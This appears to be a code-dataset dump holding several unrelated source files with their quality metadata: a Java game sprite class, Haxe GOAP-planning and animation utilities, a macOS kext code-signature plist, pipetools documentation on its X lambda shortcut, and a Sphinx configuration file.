"qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.07978457, "qsc_code_frac_chars_long_word_length": 0.00313126, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.39316239, "qsc_codepython_cate_ast": 1.0, "qsc_codepython_frac_lines_func_ratio": 0.26923077, "qsc_codepython_cate_var_zero": false, "qsc_codepython_frac_lines_pass": 0.0042735, "qsc_codepython_frac_lines_import": 0.01709402, "qsc_codepython_frac_lines_simplefunc": 0.008547008547008548, "qsc_codepython_score_lines_no_logic": 0.34188034, "qsc_codepython_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codepython_cate_ast": 0, "qsc_codepython_frac_lines_func_ratio": 1, "qsc_codepython_cate_var_zero": 0, "qsc_codepython_frac_lines_pass": 0, "qsc_codepython_frac_lines_import": 0, "qsc_codepython_frac_lines_simplefunc": 0, "qsc_codepython_score_lines_no_logic": 0, "qsc_codepython_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/BannerSprites.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.watabou.noosa.Image;
public class BannerSprites {
public enum Type {
PIXEL_DUNGEON,
BOSS_SLAIN,
GAME_OVER,
SELECT_YOUR_HERO,
PIXEL_DUNGEON_SIGNS
}
public static Image get( Type type ) {
Image icon = new Image( Assets.BANNERS );
switch (type) {
case PIXEL_DUNGEON:
icon.frame( icon.texture.uvRect( 0, 0, 132, 90 ) );
break;
case BOSS_SLAIN:
icon.frame( icon.texture.uvRect( 0, 90, 128, 125 ) );
break;
case GAME_OVER:
icon.frame( icon.texture.uvRect( 0, 125, 128, 160 ) );
break;
case SELECT_YOUR_HERO:
icon.frame( icon.texture.uvRect( 0, 160, 128, 181 ) );
break;
case PIXEL_DUNGEON_SIGNS:
icon.frame( icon.texture.uvRect( 133, 0, 255, 90 ) );
break;
}
return icon;
}
}
| 1,659 | BannerSprites | java | en | java | code | {"qsc_code_num_words": 237, "qsc_code_num_chars": 1659.0, "qsc_code_mean_word_length": 4.89451477, "qsc_code_frac_words_unique": 0.50632911, "qsc_code_frac_chars_top_2grams": 0.06206897, "qsc_code_frac_chars_top_3grams": 0.05603448, "qsc_code_frac_chars_top_4grams": 0.0862069, "qsc_code_frac_chars_dupe_5grams": 0.1862069, "qsc_code_frac_chars_dupe_6grams": 0.14137931, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.04686319, "qsc_code_frac_chars_whitespace": 0.20253165, "qsc_code_size_file_byte": 1659.0, "qsc_code_num_lines": 57.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 29.10526316, "qsc_code_frac_chars_alphabet": 0.82993197, "qsc_code_frac_chars_comments": 0.47076552, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.15151515, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.03030303, "qsc_codejava_score_lines_no_logic": 0.15151515, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
01010111/zerolib | zero/utilities/GOAP.hx | package zero.utilities;
using haxe.Json;
using zero.extensions.ArrayExt;
using zero.utilities.GOAP;
/**
* Goal Oriented Action Planning
*
* **Usage**
*
* - First, set up personas. Use `Personas.add_persona()`
*
* ```haxe
* Personas.add_persona("Lumberjack", [
* {
* name: "Chop Trees",
* prerequisites: [ "Has Axe" ],
* effects: [ "Has Wood" ],
* cost: 1
* },
* {
* name: "Gather Twigs",
* prerequisites: [],
* effects: [ "Has Wood" ],
* cost: 10
* },
* {
* name: "Get Axe",
* prerequisites: [],
* effects: [ "Has Axe" ],
* cost: 5
* }
* ]);
* ```
*
* - Then implement an Agent
*
* ```haxe
* class MyAgent implements Agent {
* public var goal:State;
* public var persona:Persona;
* public var state:Map<State, Bool>;
* public function new(persona:Persona, goal:State, state:Map<State, Bool>) {
* this.persona = persona;
* this.goal = goal;
* this.state = state;
* }
* }
* ```
*
* - And then instantiate it and run `Planner.plan()`
*
* ```haxe
* `var my_agent = new MyAgent('Lumberjack', 'Has Wood', [
* "Has Wood" => false,
* "Has Axe" => false,
* ]);
* var task = Planner.plan(my_agent);
* ```
*
* - `task` will be the task with the name "Get Axe".
* - If an axe isn't available to our lumberjack, you can remove that task - `Personas.remove_task("Lumberjack", "Get Axe");
*/
class GOAP {}
class Planner {
static var no_plan:Task = {
name: 'No plan!',
prerequisites: [],
effects: [],
cost: 0
};
public static function plan(agent:IAgent) {
if (!agent.persona.validate_persona()) return no_plan;
if (!agent.persona.validate_state(agent.goal)) return no_plan;
var satisfactory_tasks = agent.get_available_tasks().get_satisfactory_tasks(agent.goal);
if (satisfactory_tasks.length > 0) return satisfactory_tasks[0];
var out = agent.find_best_next_step();
if (out == null) out = no_plan;
return out;
}
static function find_best_next_step(agent:IAgent):Null<Task> {
var goal = [agent.goal];
var queue:Array<Task> = agent.get_required_task_set(goal);
var task:Task;
while (queue.length > 0) {
queue.sort((t1, t2) -> return t1.cost < t2.cost ? -1 : 1);
task = queue.shift();
goal = agent.get_prerequisites(task.name);
if (goal.length == 0) return task;
for (task in agent.get_required_task_set(goal)) queue.push(task);
}
return null;
}
static function get_available_tasks(agent:IAgent):Array<Task> {
if (!Personas.map.exists(agent.persona)) return [];
var available_tasks = [];
for (task in Personas.map[agent.persona]) {
var add = true;
for (prerequisite in task.prerequisites) add ? add = agent.state[prerequisite] : break;
if (add) available_tasks.push(task);
}
return available_tasks;
}
static function get_satisfactory_tasks(tasks:Array<Task>, goal:State):Array<Task> {
var out = [for (task in tasks) if (task.effects.contains(goal)) task];
out.sort((t1, t2) -> return t1.cost < t2.cost ? -1 : 1);
return out;
}
static function get_required_task_set(agent:IAgent, requirements:Array<State>):Array<Task> {
if (!Personas.map.exists(agent.persona)) return [];
return [for (task in Personas.map[agent.persona]) for (requirement in requirements) if (task.effects.contains(requirement)) task];
}
static function get_prerequisites(agent:IAgent, task:TaskName):Array<State> {
return [for (p in agent.persona.get_persona_task(task).prerequisites) if (!agent.state.exists(p) || !agent.state[p]) p];
}
static function get_persona_task(persona:Persona, task:TaskName):Null<Task> {
for (t in Personas.map[persona]) if (t.name == task) return t;
return null;
}
}
interface IAgent {
public var goal:State;
public var persona:Persona;
public var state:Map<State, Bool>;
}
typedef Task = {
name:TaskName,
prerequisites:Array<State>,
effects:Array<State>,
cost:Int,
}
class Personas {
public static var map:Map<Persona, Array<Task>> = [];
public static function add_persona(persona:Persona, tasks:Array<Task>) map.set(persona, tasks);
public static function add_personas_from_json(json:String) {
var personas:Array<PersonaSchema> = json.parse();
for (persona in personas) add_persona(cast persona.name, persona.tasks);
}
public static function validate_persona(persona:Persona):Bool {
return map.exists(persona);
}
public static function validate_task(persona:Persona, task:TaskName):Bool {
for (t in map[persona]) if (t.name == task) return true;
return false;
}
public static function validate_state(persona:Persona, state:State):Bool {
for (task in map[persona]) {
for (p in task.prerequisites) if (p == state) return true;
for (e in task.effects) if (e == state) return true;
}
return false;
}
public static function get_personas():Array<Persona> return [for (p => t in map) p];
public static function get_tasks(persona:Persona):Array<TaskName> {
return [for (task in map[persona]) task.name];
}
public static function get_states(persona:Persona):Array<State> {
var out = [];
for (task in map[persona]) {
for (p in task.prerequisites) if (!out.contains(p)) out.push(p);
for (e in task.effects) if (!out.contains(e)) out.push(e);
}
return out;
}
public static function add_task(persona:Persona, task:Task) {
if (!persona.validate_task(task.name)) map[persona].push(task);
}
public static function remove_task(persona:Persona, task:TaskName) {
for (t in map[persona]) if (t.name == task) map[persona].remove(t);
}
}
typedef TaskName = String;
typedef Persona = String;
typedef State = String;
typedef PersonaSchema = {
name:String,
tasks:Array<Task>,
} | 5,665 | GOAP | hx | en | haxe | code | {"qsc_code_num_words": 769, "qsc_code_num_chars": 5665.0, "qsc_code_mean_word_length": 4.87516255, "qsc_code_frac_words_unique": 0.15604681, "qsc_code_frac_chars_top_2grams": 0.0634836, "qsc_code_frac_chars_top_3grams": 0.05868232, "qsc_code_frac_chars_top_4grams": 0.02347293, "qsc_code_frac_chars_dupe_5grams": 0.23552947, "qsc_code_frac_chars_dupe_6grams": 0.18378234, "qsc_code_frac_chars_dupe_7grams": 0.15924246, "qsc_code_frac_chars_dupe_8grams": 0.11309683, "qsc_code_frac_chars_dupe_9grams": 0.11309683, "qsc_code_frac_chars_dupe_10grams": 0.07415311, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00451516, "qsc_code_frac_chars_whitespace": 0.17899382, "qsc_code_size_file_byte": 5665.0, "qsc_code_num_lines": 205.0, "qsc_code_num_chars_line_max": 133.0, "qsc_code_num_chars_line_mean": 27.63414634, "qsc_code_frac_chars_alphabet": 0.80154805, "qsc_code_frac_chars_comments": 0.23124448, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.09243697, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00183655, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0} |
01010111/zerolib | zero/utilities/AnimationManager.hx | package zero.utilities;
import zero.utilities.Tween;
using Math;
/**
An animation manager utility, framework agnostic. Dependent on `zero.utilities.Tween` so make sure somewhere in your project you're updating `Tween.update()`!
**Usage:**
```haxe
class AnimatedSprite {
var animation:AnimationManager;
var frames:Array<Graphic>;
public function new() {
animation = new AnimationManager({ on_frame_change: enter_frame });
animation.add({
name: 'walk',
frames: [0,1,2,3],
duration: 0.5,
});
animation.play('walk');
}
function enter_frame(index:Int) {
graphic = frames[index]; // dependent on engine/framework!
}
}
```
**/
class AnimationManager {
public var current:AnimationData;
public var animation_index(default, set):Int = -1;
public var active(get, set):Bool;
public var duration(get, set):Float;
var data:Map<String, AnimationData> = [];
var on_frame_change:Int -> Void;
var tween:Tween;
public function new(options:AnimationOptions) {
on_frame_change = options.on_frame_change;
}
public function add(data:AnimationData) {
if (data.duration == null) data.duration = 1;
if (data.type == null) data.type = LOOP_FORWARDS;
if (data.ease == null) data.ease = (n) -> n;
this.data.set(data.name, data);
return this;
}
public function play(name:String, period:Float = 0, force:Bool = false) {
if (!data.exists(name)) return;
if (current != null && current.name == name && !force) return;
current = this.data[name];
animation_index = 0;
if (tween != null) tween.active = false;
tween = Tween.get(this).duration(current.duration).ease(current.ease).set_period(period).type(current.type).prop({ animation_index: current.frames.length - 1 });
if (current.on_complete != null) tween.on_complete(current.on_complete);
on_frame_change(current.frames[0]);
}
function set_animation_index(n:Int) {
if (current == null) return n;
n = n.round() % current.frames.length;
if (animation_index == n) return n;
on_frame_change(current.frames[n]);
return animation_index = n;
}
public function pause() {
if (tween == null) return;
tween.active = false;
}
public function resume() {
if (tween == null) return;
tween.active = true;
}
public function destroy() {
tween.destroy();
data.clear();
current = null;
}
function get_active() {
return tween.active;
}
function set_active(v:Bool) {
return tween.active = v;
}
function get_duration() {
return tween.get_duration();
}
function set_duration(v:Float) {
tween.set_duration(v);
return v;
}
public function get_period() {
if (tween == null || !tween.active) return 0.0;
else return tween.get_period();
}
}
typedef AnimationOptions = {
on_frame_change:Int -> Void,
}
typedef AnimationData = {
name:String,
frames:Array<Int>,
?duration:Float,
?type:TweenType,
?ease:Float -> Float,
?on_complete:Void -> Void,
}
typedef PlayOptions = {
?period:Float
} | 2,952 | AnimationManager | hx | en | haxe | code | {"qsc_code_num_words": 387, "qsc_code_num_chars": 2952.0, "qsc_code_mean_word_length": 5.13178295, "qsc_code_frac_words_unique": 0.24547804, "qsc_code_frac_chars_top_2grams": 0.05639476, "qsc_code_frac_chars_top_3grams": 0.04582075, "qsc_code_frac_chars_top_4grams": 0.01611279, "qsc_code_frac_chars_dupe_5grams": 0.09667674, "qsc_code_frac_chars_dupe_6grams": 0.02819738, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00572129, "qsc_code_frac_chars_whitespace": 0.17107046, "qsc_code_size_file_byte": 2952.0, "qsc_code_num_lines": 129.0, "qsc_code_num_chars_line_max": 164.0, "qsc_code_num_chars_line_mean": 22.88372093, "qsc_code_frac_chars_alphabet": 0.80588476, "qsc_code_frac_chars_comments": 0.2049458, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.02409639, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0} |
00xglitch/Bella | Payloads/Insomnia.kext/Contents/_CodeSignature/CodeResources | <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>files</key>
<dict>
<key>Resources/English.lproj/InfoPlist.strings</key>
<dict>
<key>hash</key>
<data>
LE6sNDMBwbnUz+i9zA56lgq89Zw=
</data>
<key>optional</key>
<true/>
</dict>
</dict>
<key>files2</key>
<dict>
<key>Resources/English.lproj/InfoPlist.strings</key>
<dict>
<key>hash</key>
<data>
LE6sNDMBwbnUz+i9zA56lgq89Zw=
</data>
<key>optional</key>
<true/>
</dict>
</dict>
<key>rules</key>
<dict>
<key>^Resources/</key>
<true/>
<key>^Resources/.*\.lproj/</key>
<dict>
<key>optional</key>
<true/>
<key>weight</key>
<real>1000</real>
</dict>
<key>^Resources/.*\.lproj/locversion.plist$</key>
<dict>
<key>omit</key>
<true/>
<key>weight</key>
<real>1100</real>
</dict>
<key>^version.plist$</key>
<true/>
</dict>
<key>rules2</key>
<dict>
<key>.*\.dSYM($|/)</key>
<dict>
<key>weight</key>
<real>11</real>
</dict>
<key>^(.*/)?\.DS_Store$</key>
<dict>
<key>omit</key>
<true/>
<key>weight</key>
<real>2000</real>
</dict>
<key>^(Frameworks|SharedFrameworks|PlugIns|Plug-ins|XPCServices|Helpers|MacOS|Library/(Automator|Spotlight|LoginItems))/</key>
<dict>
<key>nested</key>
<true/>
<key>weight</key>
<real>10</real>
</dict>
<key>^.*</key>
<true/>
<key>^Info\.plist$</key>
<dict>
<key>omit</key>
<true/>
<key>weight</key>
<real>20</real>
</dict>
<key>^PkgInfo$</key>
<dict>
<key>omit</key>
<true/>
<key>weight</key>
<real>20</real>
</dict>
<key>^Resources/</key>
<dict>
<key>weight</key>
<real>20</real>
</dict>
<key>^Resources/.*\.lproj/</key>
<dict>
<key>optional</key>
<true/>
<key>weight</key>
<real>1000</real>
</dict>
<key>^Resources/.*\.lproj/locversion.plist$</key>
<dict>
<key>omit</key>
<true/>
<key>weight</key>
<real>1100</real>
</dict>
<key>^[^/]+$</key>
<dict>
<key>nested</key>
<true/>
<key>weight</key>
<real>10</real>
</dict>
<key>^embedded\.provisionprofile$</key>
<dict>
<key>weight</key>
<real>20</real>
</dict>
<key>^version\.plist$</key>
<dict>
<key>weight</key>
<real>20</real>
</dict>
</dict>
</dict>
</plist>
| 2,380 | CodeResources | kext/contents/_codesignature/coderesources | en | unknown | unknown | {} | 0 | {} |
0101/pipetools | docs/source/xobject.rst | The X object
============
The ``X`` object is a shortcut for writing simple, one-argument lambdas.
It's roughly equivalent to this: ``lambda x: x``
Example::
~X.some_attr.some_func(1, 2, 3).whatever
# produces:
lambda x: x.some_attr.some_func(1, 2, 3).whatever
~(X > 5)
# produces:
lambda x: x > 5
Any of the :ref:`supported operations <x-supported-operations>` performed on an
``X`` object yield another one that remembers what was done to it, so they
can be chained.
.. _x-tilde
The ``~`` operator creates the actual function that can be called (without
creating just another ``X`` instance). However, this can be omitted within
*pipe* and :doc:`pipeutils` context where ``X`` is converted to a function
automatically::
users > where(X.is_staff) | foreach(X.first_name) | X[:10]
But you can make use of ``X`` even outside *pipetools*, you just have to
remember to prefix it with ``~``
::
my_list = list(users)
my_list.sort(key=~X.last_login.date())
.. _x-supported-operations:
Currently supported operations
------------------------------
Most Python operators are supported now, but if you're still
missing something you can add it yourself or create an issue on github_.
.. _github: https://github.com/0101/pipetools
* attribute access (``__getattr__``)::
X.attr
getattr(X, 'something')
* comparisons: ``==``, ``!=``, ``<``, ``<=``, ``>``, ``>=``::
X == something
X <= 3
* unary arithmetic operators (``+``, ``-``)::
+X
-X
* binary arithmetic operators (``+``, ``-``, ``*``, ``**``, ``@``, ``/``, ``//``, ``%``)::
X - 3
X + " ...that's what she said!"
3 - X # works in both directions
* bitwise operators (``<<``, ``>>``, ``&``, ``^``)::
1 >> X
X & 64
Current limitations
-------------------
* call (``__call__``) will only work if X is not in the arguments::
# will work
X.method()
X(some, agrs, some=kwargs)
# will not work
obj.method(X)
some_function(X, some=X)
X.do(X)
* item access or slicing (``__getitem__``) will only work if X is not in the
in the index key::
# will work
X['key']
X[0]
X[:10]
X[::-1]
# will not work
foo[X]
bar[X:]
baz[::X]
X[X.columns]
* is contained in / contains (``in``)
Unfortunately, ``X in container`` can't be done (because the magic method is
called on the container) so there's a special method for that::
X._in_(container)
The opposite form ``item in X`` has not been implemented either.
* special methods (``~``, ``|``)
They have been given :ref:`special meanings <x-tilde>` in pipetools,
so could no more be used as bitwise operations.
* logical operators (``and``, ``or``, ``not``) will not work;
they are not exposed as magic methods in Python.
* await operator (``await X``) has not been implemented
| 2,873 | xobject | rst | en | restructuredtext | text | {"qsc_doc_frac_chars_curly_bracket": 0.0, "qsc_doc_frac_words_redpajama_stop": 0.25990491, "qsc_doc_num_sentences": 30.0, "qsc_doc_num_words": 406, "qsc_doc_num_chars": 2873.0, "qsc_doc_num_lines": 136.0, "qsc_doc_mean_word_length": 4.18226601, "qsc_doc_frac_words_full_bracket": 0.0, "qsc_doc_frac_lines_end_with_readmore": 0.0, "qsc_doc_frac_lines_start_with_bullet": 0.0, "qsc_doc_frac_words_unique": 0.43596059, "qsc_doc_entropy_unigram": 4.63870798, "qsc_doc_frac_words_all_caps": 0.07131537, "qsc_doc_frac_lines_dupe_lines": 0.075, "qsc_doc_frac_chars_dupe_lines": 0.02882743, "qsc_doc_frac_chars_top_2grams": 0.00942285, "qsc_doc_frac_chars_top_3grams": 0.01413428, "qsc_doc_frac_chars_top_4grams": 0.01531213, "qsc_doc_frac_chars_dupe_5grams": 0.08833922, "qsc_doc_frac_chars_dupe_6grams": 0.06242638, "qsc_doc_frac_chars_dupe_7grams": 0.06242638, "qsc_doc_frac_chars_dupe_8grams": 0.06242638, "qsc_doc_frac_chars_dupe_9grams": 0.06242638, "qsc_doc_frac_chars_dupe_10grams": 0.0, "qsc_doc_frac_chars_replacement_symbols": 0.0, "qsc_doc_cate_code_related_file_name": 0.0, "qsc_doc_num_chars_sentence_length_mean": 15.61271676, "qsc_doc_frac_chars_hyperlink_html_tag": 0.02018796, "qsc_doc_frac_chars_alphabet": 0.74532502, "qsc_doc_frac_chars_digital": 0.01068566, "qsc_doc_frac_chars_whitespace": 0.21823877, "qsc_doc_frac_chars_hex_words": 0.0} | 1 | {"qsc_doc_frac_chars_replacement_symbols": 0, "qsc_doc_entropy_unigram": 0, "qsc_doc_frac_chars_top_2grams": 0, "qsc_doc_frac_chars_top_3grams": 0, "qsc_doc_frac_chars_top_4grams": 0, "qsc_doc_frac_chars_dupe_5grams": 0, "qsc_doc_frac_chars_dupe_6grams": 0, "qsc_doc_frac_chars_dupe_7grams": 0, "qsc_doc_frac_chars_dupe_8grams": 0, "qsc_doc_frac_chars_dupe_9grams": 0, "qsc_doc_frac_chars_dupe_10grams": 0, "qsc_doc_frac_chars_dupe_lines": 0, "qsc_doc_frac_lines_dupe_lines": 0, "qsc_doc_frac_lines_end_with_readmore": 0, "qsc_doc_frac_lines_start_with_bullet": 0, "qsc_doc_frac_words_all_caps": 0, "qsc_doc_mean_word_length": 0, "qsc_doc_num_chars": 0, "qsc_doc_num_lines": 0, "qsc_doc_num_sentences": 0, "qsc_doc_num_words": 0, "qsc_doc_frac_chars_hex_words": 0, "qsc_doc_frac_chars_hyperlink_html_tag": 0, "qsc_doc_frac_chars_alphabet": 0, "qsc_doc_frac_chars_digital": 0, "qsc_doc_frac_chars_whitespace": 0} |
0101/pipetools | docs/source/conf.py | # -*- coding: utf-8 -*-
#
# pipetools documentation build configuration file, created by
# sphinx-quickstart on Sun Sep 30 12:47:08 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import pipetools
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'pipetools'
copyright = u'2012, 0101'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
release = pipetools.__versionstr__
# The short X.Y version.
version = release[:-2]
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'monokai'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
